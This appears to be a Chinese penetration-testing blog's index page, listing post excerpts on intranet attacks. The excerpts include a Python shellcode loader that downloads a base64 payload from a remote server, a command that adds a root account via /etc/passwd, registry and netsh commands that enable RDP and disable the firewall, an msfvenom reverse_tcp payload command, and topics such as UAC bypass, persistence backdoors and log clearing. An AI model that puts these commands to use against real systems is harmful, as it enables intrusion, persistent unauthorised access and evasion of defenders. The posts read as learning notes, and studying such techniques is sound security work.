内网
HoAd's blog
山巅自相逢
展开
-
python的shellcode_loader解释
python的shellcode_loader解释代码loader传到主机执行,shellcode传到自己的服务器上。简单的python shellcode加载器,直接上代码,注释都在代码里代码import ctypesimport requestsimport base64scode = requests.get("http://xxx.xxx.xxx.xxx/base64_python_payload.txt")shellcode = bytearray(base64.b64decod原创 2021-09-13 17:23:15 · 601 阅读 · 1 评论 -
windows提权总结
windows提权总结内核溢出提权Windows系统配置错误提权系统服务权限配置错误注册表键AlwaysInstallElevated可信任服务路径漏洞自动安装配置文件计划任务Windows组策略首选项提权(SYSVOL/GPP)SYSVOL绕过UAC提权msf的uac模块Nishang中的Invoke-PsUACme.ps1令牌窃取AccessToken的窃取与利用DLL劫持第三方服务提权mssql数据库提权mysql数据库提权内核溢出提权常用溢出提权最常用的本地溢出提权有 CVE-2018-812原创 2021-09-01 16:36:46 · 851 阅读 · 1 评论 -
linux恶意进程隐藏
https://mp.weixin.qq.com/s/6Z4tErcnusYHTqiSUSVz3Ahttps://blog.csdn.net/nzjdsds/article/details/82919100原创 2021-08-26 16:33:33 · 180 阅读 · 0 评论 -
linux持久化
linux持久化后门添加超级用户SUID shellalias 后门inetdcrontab后门ssh公钥免密ssh软连接SSH wrapper后门PAM隐身登录隐藏文件Git hooksPROMPT_COMMAND后门PROMPT_COMMAND提权Sudoers “trick”TCP Wrappers进程注入其他一些小技巧bash去掉history记录修改上传文件时间戳伪造Apache日志中的指定IPLinux日志清除添加超级用户echo "user:x:0:0::/:/bin/sh" >&g原创 2021-08-25 23:33:47 · 1494 阅读 · 0 评论 -
windows下3389端口开启和连接
windows下3389端口开启和连接开启3389的命令关闭防火墙的命令添加用户添加到管理员组特殊情况netstat -ano 查看端口开放情况开启3389的命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f关闭防火墙的命令NetSh Advfirewall set allprofiles state off //关闭原创 2021-08-16 23:58:09 · 4514 阅读 · 0 评论 -
bypassuac的学习
什么是UAC为什么要绕过他MSF自带的bypassuac模块在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。为什么要绕过他为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(就是为了不进行弹窗直接运行执行文件)MSF自带的bypassuac模块通过进程注入使可信任发布者证书绕过Windows UACbypassuac模块exploit/windows/local/bypassuac配置参数,即可绕过uac,切原创 2021-08-06 13:26:50 · 263 阅读 · 0 评论 -
windows下的特殊信息搜集
0x01 路径以下用户均用 administrator 代替,对于不同的 Windows 用户,名字不一,所以通常在不同的 users 目录下。1. 安装软件相关:数据文件路径:C:\Users\administrator\AppData\Roaming该路径多存放着系统上程序的数据文件,可从此处收集,如浏览器历史记录,cookie,用户信息等数据文件。2.QQ 相关:QQ 号目录:C:\Users\administrator\Documents\Tencent FilesQQ 图片缓转载 2021-08-06 13:21:59 · 224 阅读 · 0 评论 -
msf中的getsystem的原理
windows的命名管道命名管道基于smb协议通信用来让两个进程间进行通信,两个进程可以是本地进程,也可以是远程进程,类似于socket连接,是用来传输数据的,可以设置具体的权限让指定权限的进程才能连接命名管道,理论上每个程序都能连接命名管道,只是连接之后能做的事情不同,具体能做什么事跟服务端的配置有关系。命名管道是啥1.命名管道是C/S架构,必须让服务端某个进程先创建命名管道。2.命名管道可以被任何符合权限的进程去访问,且何种权限可以访问是可以自定义的。3.客户端可以是本地的某个进程或者远程的转载 2021-08-06 13:20:09 · 902 阅读 · 0 评论 -
frp的使用
frp的使用分为客户端和服务端frpc(客户端)放在靶机上面(需要代理出来流量的内网机器)./frpc -c ./frpc.inifrps(服务端)放在攻击机上面./frps-c ./frps.ini./frps-c ./frps.ini >/dev/null 2>&1 & 后台进行执行frps配置[common]bind_port = 7000# 指定 仪表盘控制界面 Dashboard 的监听的 IP 地址 //0.0.0.0 为所以IP均可访问原创 2021-07-31 04:25:59 · 240 阅读 · 0 评论 -
msf的reverse_tcp和bind_tcp两者的区别
msf的reverse_tcp和bind_tcp两者的区别reverse_tcpbind_tcpreverse_httpreverse_https安全性reverse_tcp攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这时如果在攻击机监听该端口会发现测试机已经连接。msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=0.0.0.0 lport=4444 -f elf -o shellbi原创 2021-07-31 04:24:02 · 5726 阅读 · 0 评论